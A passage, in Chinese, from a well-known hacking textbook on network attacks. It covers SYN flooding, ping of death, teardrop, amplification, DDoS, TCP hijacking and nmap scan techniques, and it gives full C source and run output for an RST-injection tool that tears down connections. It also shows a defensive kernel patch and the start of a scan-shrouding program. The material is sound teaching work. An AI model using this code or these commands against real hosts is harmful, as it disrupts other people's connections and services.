编译器仍然失败，因为需要为 libnet 设置几个强制性的定义标志。与 libnet 一起，有一个名为 libnet-config 的程序会输出这些标志。

reader@hacking:~/booksrc $ libnet-config --help
Usage: libnet-config [OPTIONS]
Options:
        [--libs]
        [--cflags]
        [--defines]
reader@hacking:~/booksrc $ libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN

在这两个中，使用 BASH shell 的命令替换功能，这些定义可以动态地插入到编译命令中。

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o synflood
synflood.c -lnet
reader@hacking:~/booksrc $ ./synflood
Usage:
./synflood       <target host> <target port>
reader@hacking:~/booksrc $ 
reader@hacking:~/booksrc $ ./synflood 192.168.42.88 22
Fatal: can't open network interface.  -- this program must run as root.
reader@hacking:~/booksrc $ sudo ./synflood 192.168.42.88 22 
SYN Flooding port 22 of 192.168.42.88..

在上面的例子中，主机 192.168.42.88 是一台运行在 cygwin 上、端口 22 的 openssh 服务器的 Windows XP 机器。下面的 tcpdump 输出显示了从看似随机的 IP 地址向主机发送的伪造 SYN 数据包洪水。当程序运行时，无法建立到该端口的合法连接。

reader@hacking:~/booksrc $ sudo tcpdump -i eth0 -nl -c 15 "host 192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:08:16.334498 IP 121.213.150.59.4584 > 192.168.42.88.22: S
751659999:751659999(0) win 14609
17:08:16.346907 IP 158.78.184.110.40565 > 192.168.42.88.22: S
139725579:139725579(0) win 64357
17:08:16.358491 IP 53.245.19.50.36638 > 192.168.42.88.22: S
322318966:322318966(0) win 43747
17:08:16.370492 IP 91.109.238.11.4814 > 192.168.42.88.22: S
685911671:685911671(0) win 62957
17:08:16.382492 IP 52.132.214.97.45099 > 192.168.42.88.22: S
71363071:71363071(0) win 30490
17:08:16.394909 IP 120.112.199.34.19452 > 192.168.42.88.22: S
1420507902:1420507902(0) win 53397
17:08:16.406491 IP 60.9.221.120.21573 > 192.168.42.88.22: S
2144342837:2144342837(0) win 10594
17:08:16.418494 IP 137.101.201.0.54665 > 192.168.42.88.22: S
1185734766:1185734766(0) win 57243
17:08:16.430497 IP 188.5.248.61.8409 > 192.168.42.88.22: S
1825734966:1825734966(0) win 43454
17:08:16.442911 IP 44.71.67.65.60484 > 192.168.42.88.22: S
1042470133:1042470133(0) win 7087
17:08:16.454489 IP 218.66.249.126.27982 > 192.168.42.88.22: S
1767717206:1767717206(0) win 50156
17:08:16.466493 IP 131.238.172.7.15390 > 192.168.42.88.22: S
2127701542:2127701542(0) win 23682
17:08:16.478497 IP 130.246.104.88.48221 > 192.168.42.88.22: S
2069757602:2069757602(0) win 4767
17:08:16.490908 IP 140.187.48.68.9179 > 192.168.42.88.22: S
1429854465:1429854465(0) win 2092
17:08:16.502498 IP 33.172.101.123.44358 > 192.168.42.88.22: S
1524034954:1524034954(0) win 26970
15 packets captured
30 packets received by filter
0 packets dropped by kernel
reader@hacking:~/booksrc $ ssh -v 192.168.42.88
OpenSSH_4.3p2, OpenSSL 0.9.8c 05 Sep 2006
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Connecting to 192.168.42.88 [192.168.42.88] port 22.
debug1: connect to address 192.168.42.88 port 22: Connection refused
ssh: connect to host 192.168.42.88 port 22: Connection refused
reader@hacking:~/booksrc $

一些操作系统（例如，Linux）使用一种称为 syncookies 的技术来尝试防止 SYN 洪水攻击。使用 syncookies 的 TCP 栈使用基于主机细节和时间（以防止重放攻击）的值调整响应 SYN/ACK 包的初始确认号。

TCP 连接实际上只有在检查 TCP 握手的最终 ACK 包时才会变得活跃。如果序列号不匹配或 ACK 永远没有到达，就不会创建连接。这有助于防止伪造的连接尝试，因为 ACK 包需要将信息发送到初始 SYN 包的源地址。

死亡之 ping

根据 ICMP 的规范，ICMP 回显消息的数据部分只能有 2¹⁶，即 65,536 字节的数据。ICMP 数据包的数据部分通常被忽视，因为重要的信息在头部。如果发送的 ICMP 回显消息超过了指定的尺寸，几个操作系统会崩溃。这种巨大的尺寸的 ICMP 回显消息亲切地被称为“死亡之 ping”。这是一个非常简单的黑客攻击，利用了由于没有人考虑这种可能性而存在的漏洞。你应该很容易编写一个使用 libnet 执行这种攻击的程序；然而，在现实世界中它并不那么有用。现代系统都修补了这个漏洞。

然而，历史往往有惊人的相似之处。尽管过大的 ICMP 数据包不再会导致计算机崩溃，但新技术有时也会出现类似的问题。蓝牙协议，常用于手机，在 L2CAP 层也有类似的 ping 数据包，该数据包也用于测量已建立链路上的通信时间。许多蓝牙实现都存在同样的问题。Adam Laurie、Marcel Holtmann 和 Martin Herfurt 将这种攻击称为Bluesmack，并发布了同名的源代码，该代码执行这种攻击。

液滴攻击

另一种由于相同原因出现的崩溃式拒绝服务攻击被称为液滴攻击。液滴攻击利用了几个厂商在 IP 分片重组实现中的另一个弱点。通常，当一个数据包被分片时，存储在头部中的偏移量将排列整齐，以便无重叠地重新构造原始数据包。液滴攻击发送具有重叠偏移量的数据包片段，导致未检查这种不规则条件的实现不可避免地崩溃。

尽管这种特定的攻击已经不再有效，但理解这个概念可以揭示其他领域的问题。尽管不限于拒绝服务，但最近 OpenBSD 内核（以其安全性而自豪）的一个远程利用问题就与分片 IPv6 数据包有关。IPv6 使用比人们熟悉的 IPv4 更复杂的头部信息，甚至使用不同的 IP 地址格式。通常，新产品的早期实现会重复过去犯过的同样错误。

Ping 洪水攻击

洪水式拒绝服务攻击并不试图必然使服务或资源崩溃，而是试图使其过载，使其无法响应。类似的攻击可能会占用其他资源，如 CPU 周期和系统进程，但洪水攻击专门试图占用网络资源。

洪水的最简单形式就是 ping 洪水攻击。目标是耗尽受害者的带宽，使合法流量无法通过。攻击者向受害者发送许多大型 ping 数据包，这些数据包会消耗受害者网络连接的带宽。

这种攻击并没有什么真正高明的地方——它只是一场带宽的较量。攻击者如果拥有比受害者更大的带宽，就能发送比受害者能接收更多的数据，从而阻止其他合法流量到达受害者。

放大攻击

实际上，有一些巧妙的方法可以在不使用大量带宽的情况下执行 ping 洪水攻击。放大攻击利用欺骗和广播地址来将单个数据包流放大一百倍。首先，必须找到一个目标放大系统。这是一个允许向广播地址进行通信并且具有相对较高活跃主机数量的网络。然后，攻击者向放大网络的广播地址发送大量 ICMP 回显请求数据包，并使用受害者的系统作为欺骗的源地址。放大器将这些数据包广播到放大网络上的所有主机，然后这些主机将向欺骗的源地址（即受害者的机器）发送相应的 ICMP 回显回复数据包。

这种流量放大允许攻击者发送相对较小的 ICMP 回显请求数据包流，而受害者则被多达几百倍的 ICMP 回显回复数据包淹没。这种攻击可以使用 ICMP 数据包和 UDP 回显数据包进行。这些技术分别被称为smurf和fraggle攻击。

图 0x400-9。

分布式 DoS 洪水

分布式 DoS（DDoS）攻击是洪水 DoS 攻击的分布式版本。由于带宽消耗是洪水 DoS 攻击的目标，攻击者能够使用的带宽越多，他们能够造成的损害就越大。在 DDoS 攻击中，攻击者首先入侵多个其他主机并在它们上安装守护进程。安装了此类软件的系统通常被称为僵尸程序，构成了所谓的僵尸网络。这些僵尸程序耐心等待，直到攻击者选择一个受害者并决定发起攻击。攻击者使用某种控制程序，所有的僵尸程序同时以某种形式的洪水 DoS 攻击攻击受害者。不仅大量分布的主机增加了洪水的影响，这也使得追踪攻击源变得更加困难。

TCP/IP 劫持

TCP/IP 劫持是一种使用欺骗数据包来接管受害者和主机机器之间连接的巧妙技术。当受害者使用一次性密码连接到主机机器时，这种技术特别有用。一次性密码只能用于认证一次，这意味着对于攻击者来说，嗅探认证是毫无用处的。

要执行 TCP/IP 劫持攻击，攻击者必须与受害者处于同一网络中。通过嗅探本地网络段，可以从头部提取所有开放 TCP 连接的详细信息。正如我们所见，每个 TCP 数据包在其头部都包含一个序列号。这个序列号随着每个发送的数据包而递增，以确保数据包按正确顺序接收。在嗅探过程中，攻击者可以访问受害者（以下插图中的系统 A）与主机机器（系统 B）之间的连接序列号。然后，攻击者从受害者的 IP 地址向主机机器发送一个伪造的数据包，使用嗅探到的序列号提供正确的确认号，如图所示。

图 0x400-10。

主机机器将接收到带有正确确认号伪造的数据包，并且没有理由相信它不是来自受害者机器。

RST 劫持

一种非常简单的 TCP/IP 劫持形式涉及注入一个看起来真实的重置（RST）数据包。如果源地址被伪造且确认号正确，接收方将相信源地址实际上发送了重置数据包，并且连接将被重置。

想象一个针对目标 IP 执行此攻击的程序。从高层次来看，它将使用 libpcap 进行嗅探，然后使用 libnet 注入 RST 数据包。这样的程序不需要查看每个数据包，只需查看到目标 IP 的已建立 TCP 连接。许多其他使用 libpcap 的程序也不需要查看每个单独的数据包，因此 libpcap 提供了一种方法来告诉内核只发送与过滤器匹配的某些数据包。这个过滤器被称为伯克利数据包过滤器（BPF），它与程序非常相似。例如，过滤规则以过滤目标 IP 为 192.168.42.88 的数据包是"dst host 192.168.42.88"。像程序一样，这个规则由关键字组成，在实际上传到内核之前必须进行编译。tcpdump 程序使用 BPF 来过滤它捕获的数据；它还提供了一个模式来转储过滤器程序。

reader@hacking:~/booksrc $ sudo tcpdump -d "dst host 192.168.42.88"
(000) ldh      [12]
(001) jeq      #0x800          jt 2    jf 4
(002) ld       [30]
(003) jeq      #0xc0a82a58     jt 8    jf 9
(004) jeq      #0x806          jt 6    jf 5
(005) jeq      #0x8035         jt 6    jf 9
(006) ld       [38]
(007) jeq      #0xc0a82a58     jt 8    jf 9
(008) ret      #96
(009) ret      #0
reader@hacking:~/booksrc $ sudo tcpdump -ddd "dst host 192.168.42.88"
10
40 0 0 12
21 0 2 2048
32 0 0 30
21 4 5 3232246360
21 1 0 2054
21 0 3 32821
32 0 0 38
21 0 1 3232246360
6 0 0 96
6 0 0 0 
reader@hacking:~/booksrc $

在编译过滤规则后，它可以传递给内核进行过滤。对已建立连接的过滤要复杂一些。所有已建立的连接都将设置 ACK 标志，因此这是我们应寻找的。TCP 标志位于 TCP 头部的第 13 个八位字节。标志按以下顺序从左到右找到：URG、ACK、PSH、RST、SYN 和 FIN。这意味着如果 ACK 标志被打开，第 13 个八位字节将是二进制的00010000，即十进制的 16。如果 SYN 和 ACK 都被打开，第 13 个八位字节将是二进制的00010010，即十进制的 18。

为了创建一个在 ACK 标志被打开时匹配的过滤器，而不关心其他任何位，我们使用了按位与运算符。将00010010与00010000进行与操作将产生00010000，因为 ACK 位是唯一一个两个位都是1的位。这意味着tcp[13] & 16 == 16的过滤器将匹配 ACK 标志被打开的数据包，而不管其他标志的状态如何。

这个过滤器规则可以使用命名值和逆逻辑重写为tcp[tcpflags] & tcp-ack != 0。这更容易阅读，但仍然提供相同的结果。这个规则可以使用与逻辑与先前的目标 IP 规则组合；完整的规则如下所示。

reader@hacking:~/booksrc $ sudo tcpdump -nl "tcp[tcpflags] & tcp-ack != 0 and dst host 
192.168.42.88"
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
10:19:47.567378 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 2777534975 win 92 
<nop,nop,timestamp 85838571 0>
10:19:47.770276 IP 192.168.42.72.40238 > 192.168.42.88.22: . ack 22 win 92 <nop,nop,
timestamp
85838621 29399>
10:19:47.770322 IP 192.168.42.72.40238 > 192.168.42.88.22: P 0:20(20) ack 22 win 92 
<nop,nop,timestamp 85838621 29399>
10:19:47.771536 IP 192.168.42.72.40238 > 192.168.42.88.22: P 20:732(712) ack 766 win 115 
<nop,nop,timestamp 85838622 29399>
10:19:47.918866 IP 192.168.42.72.40238 > 192.168.42.88.22: P 732:756(24) ack 766 win 115  
<nop,nop,timestamp 85838659 29402>

在以下程序中，使用类似的规则来过滤 libpcap 嗅探到的数据包。当程序接收到数据包时，使用头部信息来模拟一个 RST 数据包。这个程序将按其列出顺序进行解释。

rst_hijack.c

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *);

struct data_pass {
   int libnet_handle;
   u_char *packet;
}; 

int main(int argc, char *argv[]) {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   pcap_t *pcap_handle;
   char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
   char *device;
   u_long target_ip;
   int network;
   struct data_pass critical_libnet_data;

   if(argc < 1) {
      printf("Usage: %s <target IP>\n", argv[0]);
      exit(0);
   }
   target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);

   if (target_ip == -1)
      fatal("Invalid target address");

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      fatal(errbuf);

   pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
   if(pcap_handle == NULL)
      fatal(errbuf);

   critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
   if(critical_libnet_data.libnet_handle == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must
 run

as root.\n");

   libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet));
   if (critical_libnet_data.packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand();

   set_packet_filter(pcap_handle, (struct in_addr *)&target_ip);

   printf("Resetting all TCP connections to %s on %s\n", argv[1], device);
   pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);

   pcap_close(pcap_handle); 
}

这段程序的大部分内容应该对你来说是有意义的。一开始，定义了一个data_pass结构，该结构用于通过 libpcap 回调传递数据。libnet 用于打开原始套接字接口并分配数据包内存。在回调函数中需要原始套接字文件描述符和数据包内存指针，因此这些关键的 libnet 数据存储在其自己的结构中。pcap_loop()调用中的最后一个参数是用户指针，它直接传递到回调函数。通过传递critical_libnet_data结构体的指针，回调函数将能够访问该结构体中的所有内容。此外，pcap_open_live()中使用的 snap 长度值已从4096减少到128，因为所需的信息仅限于数据包的头部。

/* Sets a packet filter to look for established TCP connections to target_ip */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip) {
   struct bpf_program filter;
   char filter_string[100];

   sprintf(filter_string, "tcp[tcpflags] & tcp-ack != 0 and dst host %s", 
inet_ntoa(*target_ip));

   printf("DEBUG: filter string is \'%s\'\n", filter_string);
   if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
      fatal("pcap_compile failed");

   if(pcap_setfilter(pcap_hdl, &filter) == -1)
      fatal("pcap_setfilter failed"); 
}

下一个函数编译并设置 BPF，以便只接受目标 IP 的已建立连接的数据包。sprintf()函数只是一个将输出打印到字符串的printf()。

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char 
*packet) {
   u_char *pkt_data;
   struct libnet_ip_hdr *IPhdr;
   struct libnet_tcp_hdr *TCPhdr;
   struct data_pass *passed;
   int bcount;

   passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct.

   IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
   TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_TCP_H);

   printf("resetting TCP connection from %s:%d ",
         inet_ntoa(IPhdr->ip_src), htons(TCPhdr->th_sport));
   printf("<---> %s:%d\n",
         inet_ntoa(IPhdr->ip_dst), htons(TCPhdr->th_dport));
   libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header
      IPTOS_LOWDELAY,                 // IP tos
      libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
      0,                              // Frag stuff
      libnet_get_prand(LIBNET_PR8),   // TTL (randomized)
      IPPROTO_TCP,                    // Transport protocol
      *((u_long *)&(IPhdr->ip_dst)),  // Source IP (pretend we are dst)
      *((u_long *)&(IPhdr->ip_src)),  // Destination IP (send back to src)
      NULL,                           // Payload (none)
      0,                              // Payload length
      passed->packet);                // Packet header memory 

   libnet_build_tcp(htons(TCPhdr->th_dport), // Source TCP port (pretend we are dst)
      htons(TCPhdr->th_sport),        // Destination TCP port (send back to src)
      htonl(TCPhdr->th_ack),          // Sequence number (use previous ack)
      libnet_get_prand(LIBNET_PRu32), // Acknowledgement number (randomized)
      TH_RST,                         // Control flags (RST flag set only)
      libnet_get_prand(LIBNET_PRu16), // Window size (randomized)
      0,                              // Urgent pointer
      NULL,                           // Payload (none)
      0,                              // Payload length
      (passed->packet) + LIBNET_IP_H);// Packet header memory

   if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

   bcount = libnet_write_ip(passed->libnet_handle, passed->packet, 
LIBNET_IP_H+LIBNET_TCP_H);
   if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
      libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.");

   usleep(5000); // pause slightly
}

回调函数模拟 RST 数据包。首先，获取关键的 libnet 数据，并使用 libnet 提供的结构设置 IP 和 TCP 头指针。我们可以使用自己从 hacking-network.h 中定义的结构，但 libnet 的结构已经存在，并且可以补偿主机的字节序。模拟的 RST 数据包使用嗅探到的源地址作为目标地址，反之亦然。嗅探到的序列号被用作模拟数据包的确认号，因为这是预期的。

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o rst_hijack rst_hijack.c -lnet
 -lpcap

reader@hacking:~/booksrc $ sudo ./rst_hijack 192.168.42.88
DEBUG: filter string is 'tcp[tcpflags] & tcp-ack != 0 and dst host 192.168.42.88'
Resetting all TCP connections to 192.168.42.88 on eth0
resetting TCP connection from 192.168.42.72:47783 <---> 192.168.42.88:22

继续劫持

欺骗的数据包不需要是 RST 数据包。当欺骗的数据包包含数据时，这种攻击变得更加有趣。主机机器接收到欺骗的数据包，增加序列号，并回应受害者的 IP。由于受害者机器不知道欺骗的数据包，主机机器的响应具有错误的序列号，因此受害者忽略该响应数据包。而且，由于受害者机器忽略了主机机器的响应数据包，受害者的序列号计数就偏移了。因此，受害者尝试发送给主机机器的任何数据包都将具有错误的序列号，导致主机机器忽略它。在这种情况下，连接的双方都有错误的序列号，导致不同步的状态。而且，由于攻击者发送了第一个导致所有这些混乱的欺骗数据包，它可以跟踪序列号并继续从受害者的 IP 地址向主机机器发送欺骗数据包。这使得攻击者可以在受害者的连接挂起的同时继续与主机机器通信。

端口扫描

端口扫描是一种确定哪些端口正在监听并接受连接的方法。由于大多数服务都在标准、已记录的端口上运行，因此这些信息可以用来确定正在运行的服务。端口扫描的最简单形式是尝试在目标系统上的每个可能的端口上打开 TCP 连接。虽然这种方法有效，但它也很嘈杂且容易被检测到。此外，当建立连接时，服务通常会记录 IP 地址。为了避免这种情况，已经发明了几种巧妙的技术。

由 Fyodor 编写的端口扫描工具 nmap 实现了以下所有端口扫描技术。这个工具已经成为最受欢迎的开源端口扫描工具之一。

潜行 SYN 扫描

SYN 扫描有时也称为半开扫描。这是因为它实际上并没有打开完整的 TCP 连接。回想一下 TCP/IP 握手：当建立完整连接时，首先发送一个 SYN 数据包，然后发送一个 SYN/ACK 数据包作为回应，最后发送一个 ACK 数据包来完成握手并打开连接。SYN 扫描不会完成握手，因此永远不会打开完整的连接。相反，只发送初始的 SYN 数据包，并检查响应。如果收到 SYN/ACK 数据包作为回应，那么该端口必须正在接受连接。这将被记录下来，并发送一个 RST 数据包来断开连接，以防止服务意外地被 DoS 攻击。

使用 nmap，可以使用命令行选项-sS执行 SYN 扫描。程序必须以 root 权限运行，因为程序不使用标准套接字，需要原始网络访问。

reader@hacking:~/booksrc $ sudo nmap -sS 192.168.42.72

Starting Nmap 4.20 ( http://insecure.org ) at 2007-05-29 09:19 PDT
Interesting ports on 192.168.42.72:
Not shown: 1696 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh 

Nmap finished: 1 IP address (1 host up) scanned in 0.094 seconds

FIN, X-mas, and Null Scans

为了应对 SYN 扫描，创建了新的工具来检测和记录半开连接。因此，又出现了一组用于隐蔽端口扫描的技术：FIN、X-mas 和 Null 扫描。这些技术都涉及向目标系统上的每个端口发送无意义的数据包。如果端口正在监听，这些数据包就会被忽略。然而，如果端口关闭并且实现遵循协议（RFC 793），则会发送一个 RST 数据包。这种差异可以用来检测哪些端口正在接受连接，而实际上并不需要打开任何连接。

FIN 扫描发送一个 FIN 数据包，X-mas 扫描发送一个同时开启 FIN、URG 和 PUSH 标志的数据包（之所以这样命名是因为标志亮起就像圣诞树一样），而 Null 扫描发送一个没有设置 TCP 标志的数据包。虽然这些扫描类型更隐蔽，但它们也可能不可靠。例如，微软对 TCP 的实现并没有像预期的那样发送 RST 数据包，这使得这种扫描方式无效。

使用 nmap，可以通过命令行选项 -sF、-sX 和 -sN 分别执行 FIN、X-mas 和 NULL 扫描。它们的输出基本上与之前的扫描相同。

伪造诱饵

另一种避免检测的方法是隐藏在几个诱饵之中。这种技术简单地在每个真实端口扫描连接之间伪造来自不同诱饵 IP 地址的连接。伪造连接的响应并不需要，因为它们只是误导。然而，伪造的诱饵地址必须使用活动主机的真实 IP 地址；否则，目标可能会意外地被 SYN 洪水攻击。

可以使用 nmap 的 -D 命令行选项指定诱饵。下面显示的示例 nmap 命令扫描 IP 192.168.42.72，使用 192.168.42.10 和 192.168.42.11 作为诱饵。

reader@hacking:~/booksrc $ sudo nmap -D 192.168.42.10,192.168.42.11 192.168.42.72

空闲扫描

空闲扫描是一种使用空闲主机伪造的数据包扫描目标的方法，通过观察空闲主机的变化来实现。攻击者需要找到一个可用的空闲主机，该主机没有发送或接收任何其他网络流量，并且具有产生可预测 IP ID 的 TCP 实现，这些 IP ID 随每个数据包以已知增量变化。IP ID 的目的是在每个会话中为每个数据包提供唯一性，并且通常以固定数量递增。可预测的 IP ID 从未真正被视为安全风险，而空闲扫描正是利用了这种误解。较新的操作系统，如最近的 Linux 内核、OpenBSD 和 Windows Vista，会随机化 IP ID，但较旧的操作系统和硬件（如打印机）通常不会。

首先，攻击者通过发送一个 SYN 数据包或未经请求的 SYN/ACK 数据包与空闲主机联系，并观察响应的 IP ID 来获取空闲主机的当前 IP ID。通过重复这个过程几次，可以确定每次数据包应用到的 IP ID 的增量。

然后，攻击者向目标机器上的一个端口发送带有空闲主机 IP 地址的伪造 SYN 包。根据受害机器上的那个端口是否监听，有两种可能的情况发生：

如果那个端口正在监听，将向空闲主机发送一个 SYN/ACK 包。但由于空闲主机实际上没有发送初始的 SYN 包，这个响应对空闲主机来说看起来是未请求的，因此空闲主机会通过发送一个 RST 包来响应。
如果那个端口没有监听，目标机器不会向空闲主机发送 SYN/ACK 包，因此空闲主机不会响应。

在这一点上，攻击者再次联系空闲主机以确定 IP ID 增加了多少。如果只增加了一个间隔，则空闲主机在这两次检查之间没有发送其他数据包。这意味着目标机器上的端口是关闭的。如果 IP ID 增加了两个间隔，则假设在检查之间发送了一个数据包，即 RST 包，这意味着目标机器上的端口是开放的。

步骤在下一页上以两种可能的结果进行了说明。

当然，如果空闲主机并非真正空闲，结果将会失真。如果空闲主机上有轻微的流量，每个端口可以发送多个数据包。如果发送了 20 个数据包，那么 20 个增量步骤的变化应该是一个开放端口的指示，而没有变化则表示端口关闭。即使有轻微的流量，例如空闲主机发送的一个或两个与扫描无关的数据包，这种差异也足够大，仍然可以被检测到。

如果在没有任何日志功能的空闲主机上正确使用这种技术，攻击者可以扫描任何目标，而无需透露其 IP 地址。

在找到合适的空闲主机后，可以使用 nmap 通过-sI命令行选项后跟空闲主机的地址来进行这种类型的扫描：

reader@hacking:~/booksrc $ sudo nmap -sI idlehost.com 192.168.42.7

图表 0x400-11。

主动防御（隐蔽）

端口扫描通常在系统被攻击之前用于分析系统。了解哪些端口是开放的，允许攻击者确定哪些服务可以被攻击。许多入侵检测系统（IDS）提供检测端口扫描的方法，但那时信息已经泄露。在撰写本章时，我 wonder 如果在端口扫描实际发生之前阻止端口扫描是否可能。实际上，黑客攻击就是关于想出新点子，因此将在这里介绍一种新的主动端口扫描防御方法。

首先，通过简单的内核修改可以防止 FIN、NULL 和 X-mas 扫描。如果内核从未发送重置包，这些扫描将一无所获。下面的输出使用grep查找负责发送重置包的内核代码。

reader@hacking:~/booksrc $ grep -n -A 20 "void.*send_reset" /usr/src/linux/net/ipv4/
tcp_ipv4.c
547:static void tcp_v4_send_reset(struct sock *sk, struct sk_buff *skb)
548-{
549-    struct tcphdr *th = skb->h.th;
550-    struct {
551-            struct tcphdr th;
552-#ifdef CONFIG_TCP_MD5SIG
553-            __be32 opt[(TCPOLEN_MD5SIG_ALIGNED >> 2)];
554-#endif
555-    } rep;
556-    struct ip_reply_arg arg;
557-#ifdef CONFIG_TCP_MD5SIG
558-    struct tcp_md5sig_key *key;
559-#endif
560-

     `return; // Modification: Never send RST, always return.`

561-    /* Never send a reset in response to a reset. */
562-    if (th->rst)
563-            return;
564-
565-    if (((struct rtable *)skb->dst)->rt_type != RTN_LOCAL)
566-            return;
567- 
reader@hacking:~/booksrc $

通过添加return命令（如上所示加粗），tcp_v4_send_reset()内核函数将简单地返回而不是执行任何操作。在内核重新编译后，生成的内核不会发送重置数据包，从而避免信息泄露。

核心修改前的 FIN 扫描

matrix@euclid:~ $ sudo nmap -T5 -sF 192.168.42.72
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192.168.42.72:
Not shown: 1678 closed ports

PORT   STATE         SERVICE
22/tcp open|filtered ssh
80/tcp open|filtered http
MAC Address: 00:01:6C:EB:1D:50 (Foxconn)
Nmap finished: 1 IP address (1 host up) scanned in 1.462 seconds
matrix@euclid:~ $

核心修改后的 FIN 扫描

matrix@euclid:~ $ sudo nmap -T5 -sF 192.168.42.72
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-03-17 16:58 PDT
Interesting ports on 192.168.42.72:
Not shown: 1678 closed ports
PORT   STATE         SERVICE
MAC Address: 00:01:6C:EB:1D:50 (Foxconn)
Nmap finished: 1 IP address (1 host up) scanned in 1.462 seconds
matrix@euclid:~ $

这对于依赖于 RST 数据包的扫描来说效果很好，但防止 SYN 扫描和全连接扫描的信息泄露则要困难一些。为了保持功能，开放端口必须以 SYN/ACK 数据包响应——这是无法绕过的。但如果所有关闭的端口也以 SYN/ACK 数据包响应，攻击者从端口扫描中能获取的有用信息量将会最小化。然而，简单地打开所有端口会导致性能大幅下降，这并不是所希望的。理想情况下，这一切都应该在不使用 TCP 栈的情况下完成。以下程序正是如此。它是 rst_hijack.c 程序的修改版，使用更复杂的 BPF 字符串来过滤仅针对关闭端口的 SYN 数据包。回调函数对通过 BPF 的任何 SYN 数据包伪造一个看起来合法的 SYN/ACK 响应。这将向端口扫描器发送大量的假阳性，从而隐藏合法端口。

shroud.c

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

#define MAX_EXISTING_PORTS 30

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);

struct data_pass {
   int libnet_handle; 
   u_char *packet;
};

int main(int argc, char *argv[]) {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   pcap_t *pcap_handle;
   char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
   char *device; 
   u_long target_ip; 
   int network, i;
   struct data_pass critical_libnet_data;
   u_short existing_ports[MAX_EXISTING_PORTS];

   if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
      if(argc > 2)
         printf("Limited to tracking %d existing ports.\n", MAX_EXISTING_PORTS);
      else
         printf("Usage: %s <IP to shroud> [existing ports...]\n", argv[0]);
      exit(0);
   }

   target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
   if (target_ip == -1)
      fatal("Invalid target address");

   for(i=2; i < argc; i++)
      existing_ports[i-2] = (u_short) atoi(argv[i]);

   existing_ports[argc-2] = 0;

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      fatal(errbuf);

   pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
   if(pcap_handle == NULL)
      fatal(errbuf);

   critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
   if(critical_libnet_data.libnet_handle == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run
as root.\n");

   libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet));
   if (critical_libnet_data.packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand();

   set_packet_filter(pcap_handle, (struct in_addr *)&target_ip, existing_ports);

   pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);
   pcap_close(pcap_handle);
}

/* Sets a packet filter to look for established TCP connections to target_ip */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip, u_short *ports) {
   struct bpf_program filter;
   char *str_ptr, filter_string[90 + (25 * MAX_EXISTING_PORTS)];
   int i=0;

   sprintf(filter_string, "dst host %s and ", inet_ntoa(*target_ip)); // Target IP
   strcat(filter_string, "tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack = 0");

   if(ports[0] != 0) { // If there is at least one existing port
      str_ptr = filter_string + strlen(filter_string);
      if(ports[1] == 0) // There is only one existing port
         sprintf(str_ptr, " and not dst port %hu", ports[i]);
      else { // Two or more existing ports
         sprintf(str_ptr, " and not (dst port %hu", ports[i++]);
         while(ports[i] != 0) {
            str_ptr = filter_string + strlen(filter_string);
            sprintf(str_ptr, " or dst port %hu", ports[i++]);
         }
         strcat(filter_string, ")");
      }
   }
   printf("DEBUG: filter string is \'%s\'\n", filter_string);
